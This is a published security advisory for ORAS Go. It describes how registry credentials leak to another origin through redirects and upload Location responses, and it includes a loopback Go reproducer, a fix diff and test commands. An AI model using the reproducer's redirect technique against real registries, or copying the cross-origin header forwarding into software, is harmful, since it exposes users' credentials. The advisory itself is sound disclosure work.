GHSA-VH4V-2XQ2-G5CG
Vulnerability from github – Published: 2026-07-01 21:54 – Updated: 2026-07-01 21:54ORAS Go forwards registry credentials across registry redirects
Reporter / public credit: JUNYI LIU
Summary
ORAS Go can forward registry credentials configured for one registry origin to a different HTTP origin during registry redirects.
There are two related paths:
- A manifest or metadata request authenticates to the origin registry, then the origin returns a redirect to another host or port. The redirected request can carry the origin
Authorizationheader to the redirect target. - A blob upload
POSTauthenticates to the origin registry, then the origin returns an uploadLocationon another host or port. The follow-upPUTcan carry the originAuthorizationheader to theLocationtarget.
The upload Location issue appears related to the existing public fix in pull request #1152 / GHSA-jxpm-75mh-9fp7. The manifest redirect path is a residual adjacent route: the v2 branch after the upload Location fix still forwards Basic credentials on an authenticated manifest redirect.
Impact
A registry response can cause an ORAS Go or ORAS CLI client to send configured registry credentials to an unintended endpoint. In common workflows, those credentials may come from a registry config / Docker-style auth file rather than command-line flags.
This is a credential exposure across the registry-origin boundary. I am not claiming remote code execution, registry compromise, arbitrary token theft, or live third-party impact.
Affected Versions Tested
oras-go v2.6.0: affected.oras-gomain at commita57383e580c8f2c97fb67dedfc5c9945c8c3614e: affected.oras-gov2 branch at commitd593d504779be8b69f0ba034ac9fd407d1fc8cfc: uploadLocationpath is blocked, but manifest redirect credential forwarding is still affected.- ORAS CLI at commit
3d2646279c70ba60415440e44c2ff97896e4a209, usingoras-go v2.6.0: affected when using--registry-config.
Security Invariant
Credentials resolved for one registry origin should not be silently forwarded to a different origin reached through a registry redirect or upload Location response.
Local Reproduction Overview
All testing used loopback servers and fake credentials only.
Manifest redirect flow:
- The client requests a manifest from the origin registry.
- The origin returns
401with a Basic challenge. - The client retries the origin request with the origin credential.
- The origin returns
307to another port on the same hostname. - The redirect sink receives the origin
Authorizationheader.
ORAS CLI stored-credential flow:
- A temporary registry config contains a fake Basic credential for the origin registry only.
- Run:
oras manifest fetch --plain-http --registry-config <config> <origin>/probe:latest
- The origin authenticates the request and redirects it to another port.
- The redirect sink receives the origin
Authorizationheader.
Blob upload Location flow:
- The client starts a blob upload with
POSTto the origin registry. - The origin challenges with Basic and then accepts the authenticated
POST. - The origin returns an upload
LocationURL on another port. - In affected versions, the follow-up
PUTto theLocationtarget carries the originAuthorizationheader.
Expected Result
Redirect and upload Location targets on a different HTTP origin should not receive the origin Authorization header.
Observed Result
In affected versions, redirect or Location sinks received:
Authorization: Basic <base64 origin_user:origin_pass>
Standalone Reproducer
package main
import (
"context"
"encoding/json"
"fmt"
"net/http"
"net/http/httptest"
"os"
"sync"
"github.com/opencontainers/go-digest"
"github.com/oras-project/oras-go/v3/registry/remote"
"github.com/oras-project/oras-go/v3/registry/remote/auth"
"github.com/oras-project/oras-go/v3/registry/remote/credentials"
)
type hit struct {
Method string `json:"method"`
Path string `json:"path"`
Host string `json:"host"`
Auth string `json:"auth,omitempty"`
}
func main() {
const username = "origin_user"
const password = "origin_pass"
const expectedAuth = "Basic b3JpZ2luX3VzZXI6b3JpZ2luX3Bhc3M="
var mu sync.Mutex
var originHits, sinkHits []hit
record := func(dst *[]hit, r *http.Request) {
mu.Lock()
defer mu.Unlock()
*dst = append(*dst, hit{
Method: r.Method,
Path: r.URL.RequestURI(),
Host: r.Host,
Auth: r.Header.Get("Authorization"),
})
}
manifest := []byte(`{"schemaVersion":2,"mediaType":"application/vnd.oci.image.manifest.v1+json","config":{"mediaType":"application/vnd.unknown.config.v1+json","digest":"sha256:44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a","size":2},"layers":[]}`)
manifestDigest := digest.FromBytes(manifest).String()
sink := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
record(&sinkHits, r)
if r.Header.Get("Authorization") != expectedAuth {
w.Header().Set("Www-Authenticate", `Basic realm="redirect-sink"`)
w.WriteHeader(http.StatusUnauthorized)
return
}
w.Header().Set("Content-Type", "application/vnd.oci.image.manifest.v1+json")
w.Header().Set("Docker-Content-Digest", manifestDigest)
w.Header().Set("Content-Length", fmt.Sprint(len(manifest)))
_, _ = w.Write(manifest)
}))
defer sink.Close()
origin := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
record(&originHits, r)
if r.Header.Get("Authorization") != expectedAuth {
w.Header().Set("Www-Authenticate", `Basic realm="origin"`)
w.WriteHeader(http.StatusUnauthorized)
return
}
http.Redirect(w, r, sink.URL+r.URL.RequestURI(), http.StatusTemporaryRedirect)
}))
defer origin.Close()
repo, err := remote.NewRepository(origin.Listener.Addr().String() + "/probe")
if err != nil {
panic(err)
}
repo.PlainHTTP = true
repo.Client = &auth.Client{
Client: origin.Client(),
CredentialFunc: credentials.StaticCredentialFunc(origin.Listener.Addr().String(), credentials.Credential{
Username: username,
Password: password,
}),
}
_, _, err = repo.Manifests().FetchReference(context.Background(), "latest")
leaked := false
for _, h := range sinkHits {
if h.Auth == expectedAuth {
leaked = true
}
}
result := map[string]any{
"origin_hits": originHits,
"sink_hits": sinkHits,
"error": "",
"leaked": leaked,
}
if err != nil {
result["error"] = err.Error()
}
encoded, _ := json.MarshalIndent(result, "", " ")
fmt.Println(string(encoded))
if leaked {
fmt.Println("VULNERABLE_BEHAVIOR_CONFIRMED")
return
}
fmt.Println("BOUNDARY_HELD_NO_CREDENTIAL_LEAK")
os.Exit(1)
}
Candidate Fix
The candidate fix does two things:
- In the auth client, wrap redirect handling so
Authorizationis removed when a redirect changes HTTP origin, while preserving any caller-providedCheckRedirectcallback. - In blob upload completion, only reuse the previous
POSTAuthorizationheader when the uploadLocationremains on the same HTTP origin.
The patch also adds regression coverage for both redirect cases:
- redirect before origin authentication reaches a different origin;
- redirect after origin authentication reaches a different origin.
diff --git a/registry/remote/auth/client.go b/registry/remote/auth/client.go
index 35826eb..60c9f88 100644
--- a/registry/remote/auth/client.go
+++ b/registry/remote/auth/client.go
@@ -122,7 +122,23 @@ func (c *Client) send(req *http.Request) (*http.Response, error) {
for key, values := range c.Header {
req.Header[key] = append(req.Header[key], values...)
}
- return c.client().Do(req)
+ client := c.client()
+ clientCopy := *client
+ checkRedirect := client.CheckRedirect
+ clientCopy.CheckRedirect = func(redirectReq *http.Request, via []*http.Request) error {
+ if len(via) > 0 && !sameHTTPOrigin(via[len(via)-1].URL, redirectReq.URL) {
+ redirectReq.Header.Del(headerAuthorization)
+ }
+ if checkRedirect != nil {
+ return checkRedirect(redirectReq, via)
+ }
+ return nil
+ }
+ return clientCopy.Do(req)
+}
+
+func sameHTTPOrigin(a, b *url.URL) bool {
+ return strings.EqualFold(a.Scheme, b.Scheme) && strings.EqualFold(a.Host, b.Host)
}
// credential resolves the credential for the given registry.
@@ -168,6 +184,9 @@ func (c *Client) Do(originalReq *http.Request) (*http.Response, error) {
var attemptedKey string
cache := c.cache()
host := originalReq.Host
+ if host == "" {
+ host = originalReq.URL.Host
+ }
scheme, err := cache.GetScheme(ctx, host)
if err == nil {
switch scheme {
@@ -193,6 +212,13 @@ func (c *Client) Do(originalReq *http.Request) (*http.Response, error) {
if resp.StatusCode != http.StatusUnauthorized {
return resp, nil
}
+ respHost := resp.Request.Host
+ if respHost == "" {
+ respHost = resp.Request.URL.Host
+ }
+ if respHost != host {
+ return resp, nil
+ }
// attempt again with credentials for recognized schemes
challenge := resp.Header.Get(headerWWWAuthenticate)
diff --git a/registry/remote/repository.go b/registry/remote/repository.go
index 74d6b89..0bd20ec 100644
--- a/registry/remote/repository.go
+++ b/registry/remote/repository.go
@@ -982,6 +983,7 @@ func (s *blobStore) Push(ctx context.Context, expected ocispec.Descriptor, conte
// Push or by Mount when the receiving repository does not implement the
// mount endpoint.
func (s *blobStore) completePushAfterInitialPost(ctx context.Context, req *http.Request, resp *http.Response, expected ocispec.Descriptor, content io.Reader) error {
+ originalURL := req.URL
reqHostname := req.URL.Hostname()
reqPort := req.URL.Port()
// monolithic upload
@@ -1016,8 +1018,9 @@ func (s *blobStore) completePushAfterInitialPost(ctx context.Context, req *http.
q.Set("digest", expected.Digest.String())
req.URL.RawQuery = q.Encode()
- // reuse credential from previous POST request
- if auth := resp.Request.Header.Get("Authorization"); auth != "" {
+ // reuse credential from previous POST request only when the upload location
+ // remains on the same origin.
+ if auth := resp.Request.Header.Get("Authorization"); auth != "" && sameHTTPOrigin(originalURL, location) {
req.Header.Set("Authorization", auth)
}
resp, err = s.repo.do(req)
@@ -1032,6 +1035,10 @@ func (s *blobStore) completePushAfterInitialPost(ctx context.Context, req *http.
return nil
}
+func sameHTTPOrigin(a, b *url.URL) bool {
+ return strings.EqualFold(a.Scheme, b.Scheme) && strings.EqualFold(a.Host, b.Host)
+}
+
// Exists returns true if the described content exists.
func (s *blobStore) Exists(ctx context.Context, target ocispec.Descriptor) (bool, error) {
if err := s.repo.checkPolicy(ctx, ""); err != nil {
Validation Performed
The repaired candidate fix blocked:
- manifest redirect credential forwarding;
- upload
Locationcredential forwarding.
Targeted tests passed:
go test ./registry/remote/auth -run 'TestClient_Do_Basic_Auth_Redirect|TestClient_Do' -count=1
go test ./registry/remote -run 'Test_BlobStore_Push|TestRepository' -count=1
Prior Art / Duplicate Notes
Public pull request #1152 fixes credential forwarding via unvalidated blob upload Location and references GHSA-jxpm-75mh-9fp7. The residual manifest redirect path described here is adjacent but not covered by that PR's stated upload Location scope.
Bearer realm credential exfiltration appears to be a separate issue family and is not part of this report's primary claim.
Claim Boundaries
Proven:
- Origin registry Basic credentials can reach a different redirect or upload
Locationorigin in local loopback tests. - ORAS CLI stored registry credentials can reach a redirect sink in a normal manifest fetch workflow.
- The candidate fix blocks the tested redirect and upload
Locationcredential exposures.
Not claimed:
- Live third-party exploitation.
- RCE, host compromise, or registry compromise.
- Arbitrary-host exposure beyond the tested redirect/
Locationorigin transitions. - Bearer realm behavior as part of the same claim.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "oras.land/oras-go/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-01T21:54:06Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "# ORAS Go forwards registry credentials across registry redirects\n\nReporter / public credit: JUNYI LIU\n\n## Summary\n\nORAS Go can forward registry credentials configured for one registry origin to a different HTTP origin during registry redirects.\n\nThere are two related paths:\n\n1. A manifest or metadata request authenticates to the origin registry, then the origin returns a redirect to another host or port. The redirected request can carry the origin `Authorization` header to the redirect target.\n2. A blob upload `POST` authenticates to the origin registry, then the origin returns an upload `Location` on another host or port. The follow-up `PUT` can carry the origin `Authorization` header to the `Location` target.\n\nThe upload `Location` issue appears related to the existing public fix in pull request #1152 / GHSA-jxpm-75mh-9fp7. The manifest redirect path is a residual adjacent route: the v2 branch after the upload `Location` fix still forwards Basic credentials on an authenticated manifest redirect.\n\n## Impact\n\nA registry response can cause an ORAS Go or ORAS CLI client to send configured registry credentials to an unintended endpoint. In common workflows, those credentials may come from a registry config / Docker-style auth file rather than command-line flags.\n\nThis is a credential exposure across the registry-origin boundary. I am not claiming remote code execution, registry compromise, arbitrary token theft, or live third-party impact.\n\n## Affected Versions Tested\n\n- `oras-go v2.6.0`: affected.\n- `oras-go` main at commit `a57383e580c8f2c97fb67dedfc5c9945c8c3614e`: affected.\n- `oras-go` v2 branch at commit `d593d504779be8b69f0ba034ac9fd407d1fc8cfc`: upload `Location` path is blocked, but manifest redirect credential forwarding is still affected.\n- ORAS CLI at commit `3d2646279c70ba60415440e44c2ff97896e4a209`, using `oras-go v2.6.0`: affected when using `--registry-config`.\n\n## Security Invariant\n\nCredentials resolved for one registry origin should not be silently forwarded to a different origin reached through a registry redirect or upload `Location` response.\n\n## Local Reproduction Overview\n\nAll testing used loopback servers and fake credentials only.\n\nManifest redirect flow:\n\n1. The client requests a manifest from the origin registry.\n2. The origin returns `401` with a Basic challenge.\n3. The client retries the origin request with the origin credential.\n4. The origin returns `307` to another port on the same hostname.\n5. The redirect sink receives the origin `Authorization` header.\n\nORAS CLI stored-credential flow:\n\n1. A temporary registry config contains a fake Basic credential for the origin registry only.\n2. Run:\n\n```sh\noras manifest fetch --plain-http --registry-config \u003cconfig\u003e \u003corigin\u003e/probe:latest\n```\n\n3. The origin authenticates the request and redirects it to another port.\n4. The redirect sink receives the origin `Authorization` header.\n\nBlob upload `Location` flow:\n\n1. The client starts a blob upload with `POST` to the origin registry.\n2. The origin challenges with Basic and then accepts the authenticated `POST`.\n3. The origin returns an upload `Location` URL on another port.\n4. In affected versions, the follow-up `PUT` to the `Location` target carries the origin `Authorization` header.\n\n## Expected Result\n\nRedirect and upload `Location` targets on a different HTTP origin should not receive the origin `Authorization` header.\n\n## Observed Result\n\nIn affected versions, redirect or `Location` sinks received:\n\n```http\nAuthorization: Basic \u003cbase64 origin_user:origin_pass\u003e\n```\n\n## Standalone Reproducer\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\t\"net/http/httptest\"\n\t\"os\"\n\t\"sync\"\n\n\t\"github.com/opencontainers/go-digest\"\n\t\"github.com/oras-project/oras-go/v3/registry/remote\"\n\t\"github.com/oras-project/oras-go/v3/registry/remote/auth\"\n\t\"github.com/oras-project/oras-go/v3/registry/remote/credentials\"\n)\n\ntype hit struct {\n\tMethod string `json:\"method\"`\n\tPath string `json:\"path\"`\n\tHost string `json:\"host\"`\n\tAuth string `json:\"auth,omitempty\"`\n}\n\nfunc main() {\n\tconst username = \"origin_user\"\n\tconst password = \"origin_pass\"\n\tconst expectedAuth = \"Basic b3JpZ2luX3VzZXI6b3JpZ2luX3Bhc3M=\"\n\tvar mu sync.Mutex\n\tvar originHits, sinkHits []hit\n\n\trecord := func(dst *[]hit, r *http.Request) {\n\t\tmu.Lock()\n\t\tdefer mu.Unlock()\n\t\t*dst = append(*dst, hit{\n\t\t\tMethod: r.Method,\n\t\t\tPath: r.URL.RequestURI(),\n\t\t\tHost: r.Host,\n\t\t\tAuth: r.Header.Get(\"Authorization\"),\n\t\t})\n\t}\n\n\tmanifest := []byte(`{\"schemaVersion\":2,\"mediaType\":\"application/vnd.oci.image.manifest.v1+json\",\"config\":{\"mediaType\":\"application/vnd.unknown.config.v1+json\",\"digest\":\"sha256:44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a\",\"size\":2},\"layers\":[]}`)\n\tmanifestDigest := digest.FromBytes(manifest).String()\n\n\tsink := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\trecord(\u0026sinkHits, r)\n\t\tif r.Header.Get(\"Authorization\") != expectedAuth {\n\t\t\tw.Header().Set(\"Www-Authenticate\", `Basic realm=\"redirect-sink\"`)\n\t\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\tw.Header().Set(\"Content-Type\", \"application/vnd.oci.image.manifest.v1+json\")\n\t\tw.Header().Set(\"Docker-Content-Digest\", manifestDigest)\n\t\tw.Header().Set(\"Content-Length\", fmt.Sprint(len(manifest)))\n\t\t_, _ = w.Write(manifest)\n\t}))\n\tdefer sink.Close()\n\n\torigin := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\trecord(\u0026originHits, r)\n\t\tif r.Header.Get(\"Authorization\") != expectedAuth {\n\t\t\tw.Header().Set(\"Www-Authenticate\", `Basic realm=\"origin\"`)\n\t\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\thttp.Redirect(w, r, sink.URL+r.URL.RequestURI(), http.StatusTemporaryRedirect)\n\t}))\n\tdefer origin.Close()\n\n\trepo, err := remote.NewRepository(origin.Listener.Addr().String() + \"/probe\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trepo.PlainHTTP = true\n\trepo.Client = \u0026auth.Client{\n\t\tClient: origin.Client(),\n\t\tCredentialFunc: credentials.StaticCredentialFunc(origin.Listener.Addr().String(), credentials.Credential{\n\t\t\tUsername: username,\n\t\t\tPassword: password,\n\t\t}),\n\t}\n\n\t_, _, err = repo.Manifests().FetchReference(context.Background(), \"latest\")\n\n\tleaked := false\n\tfor _, h := range sinkHits {\n\t\tif h.Auth == expectedAuth {\n\t\t\tleaked = true\n\t\t}\n\t}\n\n\tresult := map[string]any{\n\t\t\"origin_hits\": originHits,\n\t\t\"sink_hits\": sinkHits,\n\t\t\"error\": \"\",\n\t\t\"leaked\": leaked,\n\t}\n\tif err != nil {\n\t\tresult[\"error\"] = err.Error()\n\t}\n\tencoded, _ := json.MarshalIndent(result, \"\", \" \")\n\tfmt.Println(string(encoded))\n\n\tif leaked {\n\t\tfmt.Println(\"VULNERABLE_BEHAVIOR_CONFIRMED\")\n\t\treturn\n\t}\n\tfmt.Println(\"BOUNDARY_HELD_NO_CREDENTIAL_LEAK\")\n\tos.Exit(1)\n}\n```\n\n## Candidate Fix\n\nThe candidate fix does two things:\n\n1. In the auth client, wrap redirect handling so `Authorization` is removed when a redirect changes HTTP origin, while preserving any caller-provided `CheckRedirect` callback.\n2. In blob upload completion, only reuse the previous `POST` `Authorization` header when the upload `Location` remains on the same HTTP origin.\n\nThe patch also adds regression coverage for both redirect cases:\n\n- redirect before origin authentication reaches a different origin;\n- redirect after origin authentication reaches a different origin.\n\n```diff\ndiff --git a/registry/remote/auth/client.go b/registry/remote/auth/client.go\nindex 35826eb..60c9f88 100644\n--- a/registry/remote/auth/client.go\n+++ b/registry/remote/auth/client.go\n@@ -122,7 +122,23 @@ func (c *Client) send(req *http.Request) (*http.Response, error) {\n \tfor key, values := range c.Header {\n \t\treq.Header[key] = append(req.Header[key], values...)\n \t}\n-\treturn c.client().Do(req)\n+\tclient := c.client()\n+\tclientCopy := *client\n+\tcheckRedirect := client.CheckRedirect\n+\tclientCopy.CheckRedirect = func(redirectReq *http.Request, via []*http.Request) error {\n+\t\tif len(via) \u003e 0 \u0026\u0026 !sameHTTPOrigin(via[len(via)-1].URL, redirectReq.URL) {\n+\t\t\tredirectReq.Header.Del(headerAuthorization)\n+\t\t}\n+\t\tif checkRedirect != nil {\n+\t\t\treturn checkRedirect(redirectReq, via)\n+\t\t}\n+\t\treturn nil\n+\t}\n+\treturn clientCopy.Do(req)\n+}\n+\n+func sameHTTPOrigin(a, b *url.URL) bool {\n+\treturn strings.EqualFold(a.Scheme, b.Scheme) \u0026\u0026 strings.EqualFold(a.Host, b.Host)\n }\n \n // credential resolves the credential for the given registry.\n@@ -168,6 +184,9 @@ func (c *Client) Do(originalReq *http.Request) (*http.Response, error) {\n \tvar attemptedKey string\n \tcache := c.cache()\n \thost := originalReq.Host\n+\tif host == \"\" {\n+\t\thost = originalReq.URL.Host\n+\t}\n \tscheme, err := cache.GetScheme(ctx, host)\n \tif err == nil {\n \t\tswitch scheme {\n@@ -193,6 +212,13 @@ func (c *Client) Do(originalReq *http.Request) (*http.Response, error) {\n \tif resp.StatusCode != http.StatusUnauthorized {\n \t\treturn resp, nil\n \t}\n+\trespHost := resp.Request.Host\n+\tif respHost == \"\" {\n+\t\trespHost = resp.Request.URL.Host\n+\t}\n+\tif respHost != host {\n+\t\treturn resp, nil\n+\t}\n \n \t// attempt again with credentials for recognized schemes\n \tchallenge := resp.Header.Get(headerWWWAuthenticate)\ndiff --git a/registry/remote/repository.go b/registry/remote/repository.go\nindex 74d6b89..0bd20ec 100644\n--- a/registry/remote/repository.go\n+++ b/registry/remote/repository.go\n@@ -982,6 +983,7 @@ func (s *blobStore) Push(ctx context.Context, expected ocispec.Descriptor, conte\n // Push or by Mount when the receiving repository does not implement the\n // mount endpoint.\n func (s *blobStore) completePushAfterInitialPost(ctx context.Context, req *http.Request, resp *http.Response, expected ocispec.Descriptor, content io.Reader) error {\n+\toriginalURL := req.URL\n \treqHostname := req.URL.Hostname()\n \treqPort := req.URL.Port()\n \t// monolithic upload\n@@ -1016,8 +1018,9 @@ func (s *blobStore) completePushAfterInitialPost(ctx context.Context, req *http.\n \tq.Set(\"digest\", expected.Digest.String())\n \treq.URL.RawQuery = q.Encode()\n \n-\t// reuse credential from previous POST request\n-\tif auth := resp.Request.Header.Get(\"Authorization\"); auth != \"\" {\n+\t// reuse credential from previous POST request only when the upload location\n+\t// remains on the same origin.\n+\tif auth := resp.Request.Header.Get(\"Authorization\"); auth != \"\" \u0026\u0026 sameHTTPOrigin(originalURL, location) {\n \t\treq.Header.Set(\"Authorization\", auth)\n \t}\n \tresp, err = s.repo.do(req)\n@@ -1032,6 +1035,10 @@ func (s *blobStore) completePushAfterInitialPost(ctx context.Context, req *http.\n \treturn nil\n }\n \n+func sameHTTPOrigin(a, b *url.URL) bool {\n+\treturn strings.EqualFold(a.Scheme, b.Scheme) \u0026\u0026 strings.EqualFold(a.Host, b.Host)\n+}\n+\n // Exists returns true if the described content exists.\n func (s *blobStore) Exists(ctx context.Context, target ocispec.Descriptor) (bool, error) {\n \tif err := s.repo.checkPolicy(ctx, \"\"); err != nil {\n```\n\n## Validation Performed\n\nThe repaired candidate fix blocked:\n\n- manifest redirect credential forwarding;\n- upload `Location` credential forwarding.\n\nTargeted tests passed:\n\n```sh\ngo test ./registry/remote/auth -run \u0027TestClient_Do_Basic_Auth_Redirect|TestClient_Do\u0027 -count=1\ngo test ./registry/remote -run \u0027Test_BlobStore_Push|TestRepository\u0027 -count=1\n```\n\n## Prior Art / Duplicate Notes\n\nPublic pull request #1152 fixes credential forwarding via unvalidated blob upload `Location` and references GHSA-jxpm-75mh-9fp7. The residual manifest redirect path described here is adjacent but not covered by that PR\u0027s stated upload `Location` scope.\n\nBearer realm credential exfiltration appears to be a separate issue family and is not part of this report\u0027s primary claim.\n\n## Claim Boundaries\n\nProven:\n\n- Origin registry Basic credentials can reach a different redirect or upload `Location` origin in local loopback tests.\n- ORAS CLI stored registry credentials can reach a redirect sink in a normal manifest fetch workflow.\n- The candidate fix blocks the tested redirect and upload `Location` credential exposures.\n\nNot claimed:\n\n- Live third-party exploitation.\n- RCE, host compromise, or registry compromise.\n- Arbitrary-host exposure beyond the tested redirect/`Location` origin transitions.\n- Bearer realm behavior as part of the same claim.",
"id": "GHSA-vh4v-2xq2-g5cg",
"modified": "2026-07-01T21:54:06Z",
"published": "2026-07-01T21:54:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/oras-project/oras-go/security/advisories/GHSA-vh4v-2xq2-g5cg"
},
{
"type": "WEB",
"url": "https://github.com/oras-project/oras-go/commit/3c2e884e12ea52b6bff60c97f1edb7df7d0e0909"
},
{
"type": "PACKAGE",
"url": "https://github.com/oras-project/oras-go"
},
{
"type": "WEB",
"url": "https://github.com/oras-project/oras-go/releases/tag/v2.6.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "ORAS Go forwards registry credentials across registry redirects"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.